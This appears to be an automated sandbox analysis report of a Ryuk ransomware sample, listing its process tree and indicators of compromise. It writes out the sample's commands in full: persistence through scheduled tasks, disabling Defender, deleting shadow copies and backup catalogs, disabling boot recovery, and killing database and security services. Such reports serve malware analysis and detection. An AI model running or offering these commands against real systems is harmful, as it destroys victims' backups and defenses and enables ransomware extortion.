0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeDebugPrivilege 872 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeIncreaseQuotaPrivilege 1732 WMIC.exe Token: SeSecurityPrivilege 1732 WMIC.exe Token: SeTakeOwnershipPrivilege 1732 WMIC.exe Token: SeLoadDriverPrivilege 1732 WMIC.exe Token: SeSystemProfilePrivilege 1732 WMIC.exe Token: SeSystemtimePrivilege 1732 WMIC.exe Token: SeProfSingleProcessPrivilege 1732 WMIC.exe Token: SeIncBasePriorityPrivilege 1732 WMIC.exe Token: SeCreatePagefilePrivilege 1732 WMIC.exe Token: SeBackupPrivilege 1732 WMIC.exe Token: SeRestorePrivilege 1732 WMIC.exe Token: SeShutdownPrivilege 1732 WMIC.exe Token: SeDebugPrivilege 1732 WMIC.exe Token: SeSystemEnvironmentPrivilege 1732 WMIC.exe Token: SeRemoteShutdownPrivilege 1732 WMIC.exe Token: SeUndockPrivilege 1732 WMIC.exe Token: SeManageVolumePrivilege 1732 WMIC.exe Token: 33 1732 WMIC.exe Token: 34 1732 WMIC.exe Token: 35 1732 WMIC.exe Token: SeIncreaseQuotaPrivilege 1732 WMIC.exe Token: SeSecurityPrivilege 1732 WMIC.exe Token: SeTakeOwnershipPrivilege 1732 WMIC.exe Token: SeLoadDriverPrivilege 1732 WMIC.exe Token: SeSystemProfilePrivilege 1732 WMIC.exe Token: SeSystemtimePrivilege 1732 WMIC.exe Token: SeProfSingleProcessPrivilege 1732 WMIC.exe Token: SeIncBasePriorityPrivilege 1732 WMIC.exe Token: SeCreatePagefilePrivilege 1732 WMIC.exe Token: SeBackupPrivilege 1732 WMIC.exe Token: SeRestorePrivilege 1732 WMIC.exe Token: SeShutdownPrivilege 1732 WMIC.exe Token: SeDebugPrivilege 1732 WMIC.exe Token: SeSystemEnvironmentPrivilege 1732 WMIC.exe Token: SeRemoteShutdownPrivilege 1732 WMIC.exe Token: SeUndockPrivilege 1732 WMIC.exe Token: SeManageVolumePrivilege 1732 WMIC.exe Token: 33 1732 WMIC.exe Token: 34 1732 WMIC.exe Token: 35 1732 WMIC.exe Token: SeBackupPrivilege 868 vssvc.exe Token: SeRestorePrivilege 868 vssvc.exe Token: SeAuditPrivilege 868 vssvc.exe Token: SeDebugPrivilege 1328 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeSecurityPrivilege 1496 wevtutil.exe Token: SeBackupPrivilege 1496 wevtutil.exe Token: SeSecurityPrivilege 624 wevtutil.exe Token: SeBackupPrivilege 624 wevtutil.exe Token: SeSecurityPrivilege 1564 wevtutil.exe Token: SeBackupPrivilege 1564 wevtutil.exe Token: SeSecurityPrivilege 212 wevtutil.exe Token: SeBackupPrivilege 212 wevtutil.exe Token: SeSecurityPrivilege 1524 wevtutil.exe Token: SeBackupPrivilege 1524 wevtutil.exe Token: SeSecurityPrivilege 204 wevtutil.exe Token: SeBackupPrivilege 204 wevtutil.exe Token: SeSecurityPrivilege 860 wevtutil.exe Token: SeBackupPrivilege 860 wevtutil.exe Token: SeSecurityPrivilege 232 wevtutil.exe Token: SeBackupPrivilege 232 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1736 wrote to memory of 920 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 920 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 920 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 920 wrote to memory of 928 920 cmd.exe schtasks.exe PID 920 wrote to memory of 928 920 cmd.exe schtasks.exe PID 920 wrote to memory of 928 920 cmd.exe schtasks.exe PID 1736 wrote to memory of 876 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 876 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 876 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 836 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 836 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 836 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 268 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 268 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 268 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 268 wrote to memory of 468 268 cmd.exe schtasks.exe PID 268 wrote to memory of 468 268 cmd.exe schtasks.exe PID 268 wrote to memory of 468 268 cmd.exe schtasks.exe PID 1736 wrote to memory of 1480 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1480 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1480 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1480 wrote to memory of 1912 1480 cmd.exe attrib.exe PID 1480 wrote to memory of 1912 1480 cmd.exe attrib.exe PID 1480 wrote to memory of 1912 1480 cmd.exe attrib.exe PID 1736 wrote to memory of 524 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 524 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 524 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 524 wrote to memory of 668 524 cmd.exe schtasks.exe PID 524 wrote to memory of 668 524 cmd.exe schtasks.exe PID 524 wrote to memory of 668 524 cmd.exe schtasks.exe PID 1736 wrote to memory of 1476 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1476 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1476 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1476 wrote to memory of 572 1476 cmd.exe schtasks.exe PID 1476 wrote to memory of 572 1476 cmd.exe schtasks.exe PID 1476 wrote to memory of 572 1476 cmd.exe schtasks.exe PID 1736 wrote to memory of 1700 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1700 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1700 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1700 wrote to memory of 1440 1700 cmd.exe attrib.exe PID 1700 wrote to memory of 1440 1700 cmd.exe attrib.exe PID 1700 wrote to memory of 1440 1700 cmd.exe attrib.exe PID 1736 wrote to memory of 1976 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1976 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1976 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1976 wrote to memory of 1764 1976 cmd.exe attrib.exe PID 1976 wrote to memory of 1764 1976 cmd.exe attrib.exe PID 1976 wrote to memory of 1764 1976 cmd.exe attrib.exe PID 1736 wrote to memory of 1012 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1012 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 1012 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1012 wrote to memory of 1356 1012 cmd.exe cmd.exe PID 1012 wrote to memory of 1356 1012 cmd.exe cmd.exe PID 1012 wrote to memory of 1356 1012 cmd.exe cmd.exe PID 1736 wrote to memory of 384 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 384 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 1736 wrote to memory of 384 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe PID 384 wrote to memory of 1524 384 cmd.exe cmd.exe PID 384 wrote to memory of 1524 384 cmd.exe cmd.exe PID 384 wrote to memory of 1524 384 cmd.exe cmd.exe PID 384 wrote to memory of 872 384 cmd.exe taskkill.exe PID 384 wrote to memory of 872 384 cmd.exe taskkill.exe PID 384 wrote to memory of 872 384 cmd.exe taskkill.exe PID 1736 wrote to memory of 288 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1140 attrib.exe 1912 attrib.exe 1440 attrib.exe 1764 attrib.exe 1976 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit2⤵
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\RyukReadMe.txt "3⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
